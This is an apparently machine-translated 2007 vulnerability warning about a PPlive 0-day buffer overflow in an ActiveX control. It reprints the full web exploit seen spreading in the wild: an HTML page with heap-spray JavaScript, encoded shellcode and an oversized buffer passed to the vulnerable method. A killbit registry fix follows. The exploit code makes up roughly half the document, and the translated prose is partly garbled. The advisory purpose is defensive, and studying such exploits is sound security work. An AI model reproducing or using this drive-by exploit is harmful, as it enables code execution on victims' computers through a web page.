The next is you! PPlive 0Day net horse exposure! - Vulnerability warning-the black bar safety net

2007-11-15T00:00:00
ID MYHACK58:62200717617
Type myhack58
Reporter 佚名
Modified 2007-11-15T00:00:00

Description

According to a recent malicious URL detection results, and found there part of the network Marley with the latest PPlive 0Day vulnerabilities in the spread, although the current number is not much, but I believe will soon become a net Horse the main force, and with the thunder, Baidu search PA, storm video, PPS, etc. along the way, adding this year's software page Trojan tide.

The vulnerability is by the Bug Center Team of<http://www.cnbct.org/index.php>) panel of the Maple-x found, the affected version: For pplive 1. 8beat2, there is a problem of dll: MngModule.dll 1.7.0.2, in this module, there is a vsprintf function, the program allocates only the 400h(1 0 2 4 bytes)the size of the intermediate and not the length of the judgment, when submitted to more than 1 0 2 4 A A after the overflow occurs. Therefore can be judged as the basic is due to a vsprintf string length is too long, causing overflow. Thus, the writing program, do the boundary check is how important!

The vulnerability overflow module CLSID:9F0F8700-A4D8-4E24-A3E0-1CA654CB5179

Also attach the Trojan to:

<html> <body> <object classid='clsid:9F0F8700-A4D8-4E24-A3E0-1CA654CB5179' id='target'></object> <script> var heapSprayToAddress = 0x0a0a0a0a;

var shellcode = unescape( "%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + // exec calc "%u03eb%ueb59%ue805%ufff8%uffff%u494f%u4949%u4949%u5149%u565a%u5854%u3336 %u5630%u3458%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244%u3448 %u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144%u5856%u5a34%u4238%u4a44 %u4d4f%u4f4e%u4e4a%u5446%u5042%u5042%u3042%u584b%u5445%u334e%u384b%u574e %u3045%u374a%u3041%u4e4f%u584b%u444f%u414a%u384b%u354f%u4242%u3041%u4e4b %u3449%u584b%u3346%u584b%u3041%u4e50%u3341%u4c42%u3949%u4a4e%u5846%u4c42 %u3746%u3047%u4c41%u4c4c%u504d%u5041%u4c44%u4e4b%u4f46%u534b%u5546%u3246 %u3046%u4745%u4e45%u484b%u354f%u3246%u5041%u4e4b%u3648%u584b%u504e%u544b %u584b%u354f%u314e%u5041%u4e4b%u384b%u414e%u384b%u3041%u4e4b%u3849%u454e %u5246%u5046%u4c43%u5341%u4c42%u4646%u484b%u4442%u4342%u3845%u4c42%u374a %u504e%u484b%u4442%u504e%u484b%u5742%u514e%u4a4d%u484b%u464a%u304a%u4e4b %u3049%u584b%u5842%u4b42%u3042%u5042%u3042%u484b%u464a%u434e%u554f%u4341 %u4f48%u5642%u5548%u5849%u4f4a%u3843%u4c42%u574b%u5542%u464a%u4e4f%u4c50 %u4e42%u4642%u364a%u494a%u4f50%u484c%u3050%u3547%u4f4f%u4e47%u4643%u5641 %u464e%u5643%u4250%u5645%u374a%u3645%u3042%uff5a");

var heapBlockSize = 0x100000; var payLoadSize = shellcode. length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u9090%u9090"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize; memory = new Array();

for (i=0;i<heapBlocks;i++) { memory[i] = spraySlide + shellcode; } function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide. length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide. substring(0,spraySlideSize/2); return spraySlide; } var buffer = '\x0a';

while (buffer. length < 1 0 4 4) buffer += '\x0a\x0a\x0a\x0a';

target. X(true, buffer, 1); </script> </body> </html>

The current temporary solution that is in the registry set the killbit on.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9F0F8700-A4D8-4E24-A3E0-1CA654CB5179}] "Compatibility Flags"=dword:0 0 0 0 0 4 0 0

Reference connection: the preliminary exploration of ActiveX type to overflow---PPlive 0Day of

http://www.cnbct.org/index.php?action=article_view&aid=2 1

Application ' attention, the next is you!

from: cyber patrol blog